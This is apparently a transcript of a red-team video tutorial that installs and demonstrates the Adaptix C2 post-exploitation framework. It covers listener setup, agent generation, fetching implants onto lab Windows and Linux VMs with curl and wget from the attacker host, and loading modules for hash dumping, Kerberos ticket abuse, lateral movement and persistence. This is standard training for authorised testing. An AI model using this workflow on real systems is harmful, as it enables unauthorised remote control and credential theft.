Hey there, greetings everyone. Daniel Lowry back with another video for you. Today is going to be all about the Adaptix C2 server. Anybody who knows me knows I'm a bit of a C2 junkie. I enjoy the flavor of a good C2 in the morning with my cigar and coffee or whatever people eat for breakfast. I normally miss breakfast, but I like a good hash brown. Those things are delicious. That said, C2s are like my hash brown today. Things I love. And what are you going to do? It's just how I am. And Adaptix C2 is really actually pretty darn cool. If you're into C2s, you probably have heard of the idea of Cobalt Strike, right? Cobalt Strike is kind of the I'm reluctant to say the gold standard, but it is fairly ubiquitous in many a pen testing and red team shop. Red teaming, I guess, more so than pen testing necessarily, but it is a really great piece of software, and that's why a lot of people like it. And other C2s are out there, and there's plenty of open source stuff, but Cobalt Strike, obviously, it's going to cost you a little bit of money, but it tends to fit the bill for just about everything. That said, people that don't have money to spend on random C2s for the funds of it need open source stuff. And that's where, like, I've done videos on Sliver and Empire and Starkiller and, just Metasploit. I've messed around with Havoc and Coedic and, oh, what's some other villain, Mythic. I mean, there's just tons of them out there. Go check out the C2 Matrix and to your heart's content, there are C2s to be played with and had fun with. But I think my new go-to C2, that sounds like a robot from Star Wars, but no, my go-to C2 from now on is probably going to be Adaptix. I really like it. I like Empire and Starkiller as well. But let me show you what I'm working with here. Here's Adaptix C2, and you can see here it says Adaptix is an extensible post-exploitation and adversarial emulation framework. I think a lot of people don't, especially if you're new, you're starting out, you think that this is more like Metasploit, which is like an attack framework, like a vulnerability exploitation framework. That's not what this is. This is a post-exploitation framework. Most C2s are post-exploitation frameworks, which means I've exploited something and now I need post after that exploit has been done, I need to manage it and maintain control and utilize the target that has now become mine because I've exploited it, right? That's what post-exploitation C2s do, is they give you the ability to manage all the devices of which you've exploited. Okay? So it's a post-exploitation thing. After exploitation. Get that? Hopefully you do. All right. Back to it. So it's post-exploitation adversarial emulation framework made for penetration testers. The Adaptix server is written in Golang to allow for operator flexibility. The GUI client's written in C++ Qt, allowing for it to be used on Linux, Windows, and Mac OS. Well, heavens have opened up and angels have descended. So it doesn't matter whether you're using a Linux, a Windows, or a Mac OS box, you should be able to run this. Now, I'm going to be running Kali Linux today because that's what I'm working with mostly. But I do want to experiment with installing it on like Parrot just to see the difference, how that goes. Is there any? Because I've seen difficulties between Parrot and Kali when it comes to installing Havoc in Kali Linux. Simple, right? It's apt-get install, but you're good to go, right? In Parrot, I have not had that experience. Different, right? So there's differences between the two operating systems enough that I need to experiment and see how well these things run. I should also probably try to install it in a Windows environment, just for the kicks of it, right? Okay, let's see here. But you can kind of get some look and feel of this thing. Like I said, very, very Cobalt Strike-ish, right? If you look up here, let me see if I can, yeah, there we go. You can kind of get a little bit of a look here where you're looking at all the different beacons or the agents that have phoned in. You can see that there is like processes and files. Oh, by the way, I have test driven this thing already. I just kind of wanted to see you. I wanted you to see the installation and everything. It's very, very, so that you can get up to speed with it. But this is a very cool C2. We got a lot of functionality here. But there you go. You got this graphical business here, so you can see all the different targets that you've exploited in the control, whether or not they're checking in, what's going on. You get this whole console area down here. It's going to be awesome. You're going to love this. You are going to love this. And then there's a getting started, and you just hit the wiki little button right there. But it has all sorts of features: server client architecture, cross-platform GUI client, fully encrypted communications, listener and agent as plugins, BOF support, which is awesome. And yeah, we're going to have some fun. We're going to try to hook a couple of machines once we get it installed, but that's where we need to start with is the installation, which is right here. All right. So we're going to do this whole thing right here. Just copy all that. And let's begin, shall we? I'm in my tools folder, which I created. So if you don't have that, you can just put it wherever you like. But I'm going to paste that in and fire it off, cloning into, and we are now in Adaptix C2. There's all the files. Very, very cool. It does have these pre-install Linux all sh, but it doesn't tell us to use that. So we're just going to follow the bouncing ball in the installation instructions here. And it does have some pre-install, like we need a specific version of Golang 1.24.4. And that is required to compile. Required to compile. We also have this patched Golang for Windows 7 Gopher agents. So we're just going to get all this in here. You can see I'm under the Linux Debian. But if you're running that Arch, if you're that kind of a masochist, then there you go. You can click Arch and do the Arch thing. But I'm just going to kind of grab all this, copy, and we'll paste it in. And it does have, well, it shouldn't matter. There we go. Rock and roll. It's going, if we start getting too long in the tooth on waiting for things to install or download or whatever, I'll pause the video, and that way you don't have to suffer through all that. I don't want you to suffer through that. All right, we got a couple of other commands to throw at it, and that's for that Gopher agent for Windows 7. Copy that. And then Shift Control V. It was a whole lot easier than right-clicking. And wait for it. And we're done. Okay. All right, that was fairly painless. So I think we've done all the pre-install stuff for Adaptix. I think it's time to do the all-install stuff. Moving on. And if I'm remembering correctly, oh, we got this one more thing. To build the client, you need to install additional dependencies. Oh, we had one more step, my dear Daniel. We'll copy that and then paste that in and go. Yes. This might take a second. Looks like it's going fairly well. So nice. Yes. I don't know if you can hear somebody's car alarm is going off. That's always fun. It's the perks of being in a studio that's in a garage. Well, there we go. All right. So that went well. That was fine. Now we're on to the install. And it says Adaptix server and extenders, our Go plugins, must be built with the same version of Golang package, which, okay, we get that already. So we need to do make server and make extenders. I think I can remember those commands. So I will make server. And I think this takes some minutes. So I'm going to hedge my bets and go ahead and pause the video here. When I come back, that should be done. We'll do make extenders. So just give me 1 second. Okay, we're back. Got it all done. It did take a moment or two, enough that I'm glad I paused the video. But let's do the make extenders command. Make extenders. We'll fire that off. And again, I think this is another thing that just kind of takes a minute. It's going to download a bunch of stuff and then build the makefile or build from the makefile. So again, we'll take a pause here. We'll come right back in just a moment. Okay, that finally finished up. It did actually take a pretty good amount of time. Not too bad, just a few minutes. So if you were waiting for it as well, you know the pain that we just went through for a few minutes of waiting for our computer to compute. All right, let's move on. We got some other stuff we got to do to get this installation finished up. So we need to move on to, let's see here. All right, so we are doing the clients. We are Linux, Mac OS. So we're going to do make clients. All right. If it's a make, I'm sure it's going to take a hot minute again. So we're going to make clients, fire it off, And you know the drill, right? We're going to take a pause. We'll be right back in just a moment. Okay, it finally finished up. Now, this one definitely took the longest to finish up, but everything looks done. Everything looks good. And let's just go see if we got anything else we need to do. I think that is about it, unless we were doing a Windows installation, which we are not. So, that said, time to move on. If we've got everything installed correctly, we should now be able to start the server. Actually, I think we need extenders as well. We'll get to that though. Let's just keep rocking. Let's follow the bouncing ball and see where it takes us. All right, so I'm gonna kind of scroll out of here. I think there's this starting area right there. Click that, and it tells us that the necessary parameters for starting the Adaptix server can be passed via command line parameters or via configuration file. There is a default configuration file, if I'm not mistaken. Let's see here. If I do an ls, not an sl, there is maybe it's in Adaptix server. There it is right there, profile.json, right? And we can cat profile.json, JSON, not Jason. It's going to come after me with a hockey mask and a butcher knife. Let's see here. Or a machete. It was a machete, not a butcher knife. That's Michael Myers. But it should have some interesting pieces of information here, like what port it's going to be running on, what endpoints, which is /endpoints, what password to use, pass. We might have to generate some private keys, some keys here. So if I'm remembering correctly, I think we do. And then we just got to put them in the right area, and we should be good to go. All right. So cool. Let's go back and check and see how much of this I actually remembered. Oh, like, hey, use the dash profile parameter and contain this JSON formatted file, which is right here, and you're good to go. So we understand all this. Server response, yes. It says right here, to run the Adaptix server, you need an SSL certificate. Whoa, that went crazy. You need an SSL certificate. You can generate your own using the GenSSL script. Okay. Triple click, copy, and let's see here. Does it need to go here? I don't remember where it goes. I'm just gonna go to the root here, and I'm gonna do it here. So Shift Control V and fire it off. Give it a country code, which is for me US. I'm in Florida. Legal or locality name, city. We'll just city, fine. Org, fine. Unit, fine. Common name. Actually, you can just kind of like, you don't have to fill this stuff out. It should be good. I should have these certs now. I don't know if I can see them. There they are. Right there. Bing. There's one. There's two. Cool. So we have that. We got our SSL certs. Let's get back to the installation. All right, so after we have that, it says starting the adapted cert, a data directory will be created next to the server executable file and the server blah, blah, blah. Okay, so I think what I need to do is go into, or I just run ./Adaptix server /Adaptix. Well, come on now. Let's go into that Adaptix server. Adaptix. I'm probably just misspelling this. Adaptix server. Thank you. Wow. I don't know what was going on there. Like I said, that is not where it is. Where is oh, it's in the dist. There you go, Daniel. All right, cool. Now I can run ./Adaptix server. Oh, you know what I need to do? I need to copy these keys into this directory. So let's do that. I will copy ./server.rsa star here. There we go. They should be here now. Perfect. Now we can do Adaptix server -profile and then profile.json. Everything works right. We are rocking. We are rolling. I think things are running, right? Starting server at 0.0.0, 4321. It's the endpoints. Okay, everything looks like it's running. Let's get the client running. So to do the clients, after the Adaptix client is launched, so you just launch the client, just like we did there. So what I'm going to do is I'm going to split this screen. All right, bing, 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 bing. And then it is Adaptix client, a capital A, /Adaptix client. I think that's it. That is it. All right. Looks like things are, well, at least the client is running. Let's see if we can't get connected. I think for user, you can do anything you like. So I'm just going to put like, Daniel, because that's my name. For the password, it was pass. The project, we can call this anything you like. So we'll just call this test. The host is, you can go with 0.0.0.0 if you like, or you can use the IP that you wish to use. I'm going to use the IP that I have on this, 136, if I'm not mistaken. Let me verify that. Trust but verify. Never trust, always verify. Which is IP-BR-C-A. There we go. And wait for it. Yes, 136. Cool. So I'm going to put that there. And then the port was 4321. And the endpoint was /endpoint. But if we don't remember, it was in that JSON file, which was right here. There it is. Yeah, /endpoints. Perfection. I think we're about to be money. And connect. Cool. Client Daniel connected to team server. This is nice. We're good to go. We are hammered out. All right, so we're through the installation. We're through the looking glass here, people. It's time to start messing around with some stuff. So what I need to do is let me start. I've got a Windows 11. Let me get this Windows 11 thing going. Take me just a moment. Resume that guest. And then I'll get its IP address. Or, yeah, I don't have to do that. We'll get in here and we'll mess around with it. But it'll take me just a second. I'm just getting logged in. All right, that works. Yes, perfect. Excellente. So we've got a couple of devices that we can get going at. So now let's do this. First thing we need to do, create a listener. Booyah. Listeners pops up right there. You just right click anywhere here and click create. I don't know if you can see that as a bit little touchy. Yeah. You just right click anywhere, click creates, and that gives you this option right here. All right, you give the listener a name. You've got a bunch of different listener types. So we can go with Beacon HTTP, Gopher TCP, Beacon SMB, Beacon TCP. And you'll notice that these are like external and internal. So if you want to do something internally with like bind shells or whatever, and these are like more like reverse. At least that's what it seems like. All right, we'll give it a listener name. We'll go with HTTP-O listener. I like to be descriptive, 01. That looks good. And then we come down here to host port and bind, and then give it our IP, 10.10.10.136. So whatever IP you bound it to, and then choose a port that's not being used. I'm going to go with, let's go 5,000, because why not? And then we'll do the same thing down here, 10.10.10.136. This is your callback address, :5,000. You can leave the method post if you like, or you can change it to gets. I'm just going to go with the defaults. Needs a URI, which you can set to anything you like. So I'm going to change this to stuff, because why not? The user agent, you can change that. You can change the heartbeat header. I would get rid of this use SSL, just uncheck that. Otherwise, you need certificates and whatnot. Since I don't have any right now that I'm going to be using for this specific thing, I'm just unchecking it, and that's fine. Then you click Creates, and now we have ourselves a listener on port 5000. Sweetness. Now, we need an agent. We need a thing we can download and put on our targets. Remember, this is post exploitation. I've already exploited the thing. I have some ability to control this device. I'm going to generate an agent. I'm going to upload the agent, and then I'm going to run the agent. And then we should have a callback sitting here in our menu. So let's see. Like I said, you click anywhere on that type, just highlight it, right click, and hit Generate Agent. That brings this lovely box up here, and it tells you, hey, which listener do you want to use? What kind of agent are you looking for, right? This is a beacon. You'll notice it says OS Windows, and that's the only type you get with this type of agent or this type of listener. Tells you what kind of architecture are you working with. So if I needed to do x86, I could, but I am using x64 because it's Windows 11. The format is going to be exe, but you've got service exes, DLLs, and even shellcode. Like I said, this is pretty sweet. Sleep jitter is set at 4 seconds by default. I'm just going to lower that to 2 for right now because why not? If you want to set a kill date and a working time so that you can work within the parameters of your engagement, absolutely can. And then give it a service name, which I'm just going with agent service, which is the default, and click generate. Generation. Cool. So here we have a default name of agent.x64, but we can name this anything we want, and I'll just call it windshell.exe and then hit enter. It says the file was saved to the dist directory. Hit OK. All right, now I'm going to bring up another one of these things. Lovely little terminal. Terminal, CD into tools, CD into Adaptix, which I have a hard time spelling for whatever reason. And then I'm going to CD into dist because that's where it saved it. Right? And there it is right there, windshell.exe. So I'll just serve it up hot with Python. 3-m http.server, or however you want to. Whatever control you have, if you have some ability to upload strictly from there. I'm just kind of like hand waving the fact that we've attacked this and compromised it. I'm going to fire that off. And all right, let's jump over here to this Windows 11 machine. You'll notice it's just running in my VM. And I'm going to bring up a terminal. Oh, you know what we probably need to do? I think it should be good. I think this is totally going to get popped by Windows Defender or anything like that. I would almost guarantee it. So I've turned off all the firewall and the Windows Defender and all that other stuff. Just again, for demonstration purposes, you'd have to get into it a little bit and start modifying it enough so that it doesn't get signatured. But that's Red Team Tradecraft. That's beyond the scope of this episode anyway. All right, let's get back to it. So I need a terminal. I need terminal Bing. And I'm just going to use good old wget. So let me CD into documents, or I guess downloads is a better place for it. dir. And you can see this is where I was messing with it earlier with, like I said, I blew this all away, but I didn't change my lovely little Windows device here. But we're going to just wget http://10.10.10.136 on port 8000. And then it was 8000, and I called it windshell.exe. Grabola, dir. Did I get it? What's the problem here? Are we not good? Status code 200. Raw context. Well, maybe. You know what I need to do? Probably curl. Curl http://10.10.10.136. Port 8000, windshell. Boy, I'm a horrible typist. .exe-o windshell.exe. dir. Hey, there we go. Now we've got it. I'm so used to working in Linux that I just take it for granted that wget is there, and then I have to end up using curl. All right, now that we have that, I'm going to open the folder, actually. I'm going to open the folder. It can do it. I know I clicked the button. And then I'm going to go to downloads where we downloaded the thing. Come on. For whatever reason, clicking seems to be a struggle for it today. And double click on that. I noticed that there's a spinning Cheerio of fun. Let's jump back over and take a look at Adaptix. And oh, look, we've got ourselves something on the hook, a little Windows device. If you come up here and click this little icon that looks like a weird star, that's the session graph. That's where you get this lovely view right here. It's very cool. And then you can right click and hit console, mess with the agent, right? This is where I told you this thing gets super cool. Now that we've actually got something hooked in, we get to have some real fun. Lots of cool stuff going on in here. So I can go to console, right? Click on that. That opens the console for this. And you can type in help. And it shows you all the commands that are available for this, right? Now, that said, if you're remembering correctly, there was some, we talked about the extensions or the extenders where the BOF files are. I don't have them in here yet. We never cloned that repository, right? If you go to extender up here at the top, hit open extender, right click, load new, I ain't got none. I got none. We got to go get that repo so that we can load these things in here so that we can use them as commands in here. Because otherwise, we don't got a whole lot we can do. I mean, let me see if I can do anything like PWD. Okay, well, that's good. That works. So that's just built-in stuff. And that's why it's showing me a very limited set of commands because I don't have any here just yet. So let's jump back over to our documentation. And let's see what we can find. We got a user interface, listeners and agents, which we looked at, agent browsers. We didn't look at that. All right, let's look at that real quick because I think that is actually fairly cool. So if you go here and you click on the console, or if you're in this view, you can right click on it, go to browsers and hit file browser. You ready for this? And you're like, oh, I mean, that's cool, but it's not doing anything, Daniel. Yeah, you see there's this little refresh button. You got to hit that. And then voila, this is so nice to be able to deal with files and work with the directory to have a nice GUI interface to be able to manipulate stuff, right? There's all our files that we've been messing around with, right? There's windshell.exe. So it's all right there. I love this view. You can also go back up, right click, browsers, go to process browser, fire that off. Don't forget to hit refresh. And you can see the processes that are going on, right? Tell me this is not money. I love this. I'm going to close the process browsers and I'll close the file browser. But very, very cool stuff. All right, let's go back to the documentation. We looked at agent browsers, data management. Okay, let's go to BOF and extensions. Clickety click. All right, so you've got this official extensions, which I have here. Right? And we are here. Yeah. It says BOF is just a block of position independent code that receives pointers to some beacon internal APIs. BOFs are single file C programs that call Windows 32 APIs and limited beacon APIs. Let's see here. Description of BOFs, how you get them installed. But I think ultimately what you need to do is you grab this. Let's get that. Copy that right there. So copy. We'll run to here. I can close this Python HTTP server. And let's go here. It looks like a good place to put it. And we'll just git clone, and paste that in. Getting those extensions. And now we have this extension kit folder right there. CD into that extension, because if you don't do this, they're not going to work. Extension kit. There you go. And now you need to go. This is kind of a bit of a drudgery. Not too bad, but it does take some time and a little bit of effort on your part. You could probably script this out, but one does not exist at this point in time. So if you go into each one of these folders, so let's go in that first one, ad-bof, right? You do an ls. You have a make file in here. And then you have this ad_beacon.json. That's the file we need to add, but we have to run the make file first. So we run make. I think we just run make. Yeah, there you go. And that gives us this whole LDAP search thing. And then you go to the next one, which is aliases. And like I said, this is going to take some time. Now, this one doesn't actually have a make file, so should be good to go. That's nice. Next one is creds.bof and make. Yep. See, it's kind of showing you all the different things that you're going to have the ability to do with your BOFs, like hash dump, right? Super cool. All right, let's go back. CD into elevation and make that one. And it's just going to be a lot of this execution. Let's get through it, shall we? Make. Injection. I like that. That looks good. Anything cool? Inject config. Inject. Okay, cool. Let's go into Kerberos and make that joker. Hash, K-list, triage, dump, describe, TGT delegate, I assume PTT, purge, ask TGT. Oh, this is all ticket. This is all Kerberosting stuff right here. This is something you definitely want to add to your Adaptix server. All right, let's back it out of there. Lateral movement, always a nice one. Make that. We got PS exec, token make, token steal. Cool. Let's go into postx, make screenshots and add firewall rule. That could come in handy. Let's see here. Process, make that. Creating bin, find module, find proc handle. Probably good for loading into, like doing side loading DLLs and stuff like that. Let's see here. Sal, BOF, make. Oh, this is giving us some like useful tools like ARP, calcs, or cackles. I guess they always want to call it calcs. Netstat, NSLOOKUP. So this is like a lot more functionality when it comes to standard tools for your operating systems. Let's go back. I got one more CD SAR and make. And this does Q user. All right, now that we've done that, now that we've got all those make files done, we should now be able to import those BOFs into our system and gain that capability. So let's jump over to Adaptix, go to Extender, click on that, hit Open Extender. From there, you just right-click, load new, find your where you downloaded all that stuff. I'm in Adaptix C2, I'm in Extension Kits, and alias.bof. And then you're going to grab those JSON files and just double click them and work your way through it, right? Load new, tools, Adaptix C2, extension kit, creds, bing, load new. Again, there's no way to batch these in, which is kind of a pain, maybe in the next version. But once you did the heavy lifting of all these, it shouldn't be too bad. Like you're just doing one-offs at that point. Extension kits. I forgot aliases. Let's see here. Load new, tools, Adaptix, extension kit. What we do? Elevation. Yeah, there we go. Load new. I'm going to go ahead and just get them all because we want all the functionality. I wants it all. Q Queen, right? I want it all. I want it all. Load up some new tools, right? Yeah, tools. Adaptix. My brain is starting to turn to mush at this point. Injections. Yes. Load new. Tools. Oh, it's 2 clicks, Daniel. Adaptix. Extension kits. Kerberos. Yeah, definitely Kerberos. Load new. Tools. Adaptix C2. Extension kit. Where we at? Lateral movement. Lateral movement. Beautiful. Load new. Tools. Adaptix C2. Extension kits. PostX. We are almost at the station. Adaptix C2. And that way you just see, I know it's kind of a pain to watch me do this, but sometimes you're getting through a process, and I don't want to assume that you like everything's going hunky dory. So I want you to see every click I'm making and what I'm doing and how I'm doing it. What was I at? Process beacon. I don't know if I double loaded. We'll go check that here in a second. To extension kit, Sal. That was a really good one. I like Sal. Load new. I think this is the last one. Tools, Adaptix extension, SAR beacon. Whew. Okay. Just kind of run through these things, make sure I didn't get doubled up. It doesn't look like I did. Execution, elevation, curve, wrestling, post, blah, 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 blah. All right, looking good. Now, if you click on any one of these, it shows you the code for it, which is a nice little feature. Kind of gives you like, hey, what is this going to do before I load it up? But you're good to go, right? So you can just kind of check through these things and see how they work. Plus, you could use that as a template for creating your own BOF files to import here. So I'm going to click close. And now let's see here. If I do help, look at how much more we have the ability to do at this point, right? That, my friends, is money. We can do all sorts of fun stuff like list mounted disks on current systems. So I can do disks and scroll down, and you'll notice it keeps all the output, right? So there's everything. This is a history of everything we've done inside of this. And as long as this agent is running, and of course you'd want to like set a scheduled task for persistence, maybe a registry entry, use all the oldies but goodies registry, maybe even create a BOF that would allow you to gain persistence by creating scheduled tasks or registry entries or startup files or whatever the case is, right? Whatever you're looking to do. But that is super cool. Now, I think we're good. Let me show you a Linux machine real quick. And that way we'll call it a day. So I'm going to go to listeners. I'm going to create a new listener, right click, create. And what you're going to want to do is name the listener name. And we're going to change the listener type right here. Change that to Gopher TCP. And then from there, we'll call it Gopher listener-01. And then we kind of do some of the similar things we did before, right? So 10.10.10.136, which is our Adaptix server 4444. It looks good to me. 10.10.10.136 on 4444. Timeout in seconds, TCP banner. You can probably change that, would be a good idea. And then just click create. Now we've got that. There's our Gopher listener right there. Right click, generate an agent. You'll notice that this is a little bit different, right? So the agent is Gopher, the OS is Windows, but then we can go to Linux or Mac. So I'm going to click Linux, select my architecture. What's the binary format that we would like, which is ELF files. But of course, sometimes you can click these things. You'll notice we do have ARM64 is available there. That's good to know. If you're working with like IoT stuff, might be using ARM processors, most likely anyway. All right, click generate. And then we got to give it a name. We are in the dist file. It's called agent.bin, but I'm going to call it linshell.bin, and save that. All right, it has been saved. Go back here, and we will go back to Python serving. Oh, we're in the wrong spot. Got to go back. CD into dist. Right, there we go. And we got linshell right there. So Python it up, Python 3-m http.server, and we will get logged in. I guess I can SSH into it. That's probably the easiest way to get into this machine at this point. SSH into 10.10.10. Oh, I do not know the IP address of this thing. Not off the top of my head anyway. All right, well, you know what? We'll just do it the old-fashioned way. It's this little thing right here, which I've enjoyed. Let's see here. This little Linux Lite machine comes in handy as a test bed for a lot of stuff. So there we go. And let's get a terminal up and running here. Terminal. Show me the terminal. Okay. And we will wget http://10.10.10.130 port 8000 /linshell.bin. Connection refused. Oh, because that's not the right IP address. It's 136. That connection is not refused. Now, there we go. We have linshell. I'm going to copy that to just shell. Of course, it helps if you do linshell to shell. And then I'm just going to .chmod, or you can just do bash shell. Yes, you can. You can do it. I'll chmod it then. Chmod plus x shell and /shell. Cool. Let's jump back, get into our server. We notice we now have a Gopher listener right there. Excelente. You can do all the fun stuff. Of course, we can see it here. Have a great time with it. Booyah. There is a Linux. And you can see the difference, right? That's a Windows machine. It's a Linux machine. Right click. I can go to the console on this. I can do help to see all the file or the commands we can run on it. So if I want to execute a command via shell, but we got a lot, honestly, here. So if you want to know something about it, you basically, a lot of the commands that you're going to need are right here. But if you need to run a shell command, you could. You also have run. I think it's for executing long commands via or scripts. So we've got longer stuff. We can show the process list. We can make a directory. All sorts of great stuff. I'm just going to run ls. And look at that. Look at that, right? It is glorious. Well, there you go. Adaptix C2. I know this is a bit of a longer episode. Wow. I know. But hey, very full featured, lots of functionality. I just wanted to kind of share it with you. If you were interested on getting it installed, well, now you got a guide. Hopefully it helps you. If you need to get it up and running, now you've got a guide. Hopefully it helps you. And you can get to working with this thing because I think it's really cool. And if you're really into red teaming stuff, this is the kind of thing you're going to want to utilize so that when you do graduate into being able to use something like cobaltstrike, you feel very comfortable. Heck, you may even just go, I don't need cobaltstrike. I can use that. Your shop is probably using that. So, or bruteratel or something. But now you have some hands-on that's very similar in the look and feel of that system. And you should be able to work fairly well throughout. I hope you enjoyed this episode. I know it was a bit long. I mean, I'm tired. I'm a tired guy. But I do it for you out there. Thanks for watching, everyone. You know what to do. Hit that like and subscribe if you got some value out of this episode. And definitely join me on Fridays at 10 a.m. Eastern for Cybercast IRL, where you can chat live with me and do a little live stream there. And we have a lot of fun. A lot of people show up and we have a great conversation. We talk about just anything cybersecurity related. So bring your stuff. And we look forward to seeing you there. Until next time, keep hacking.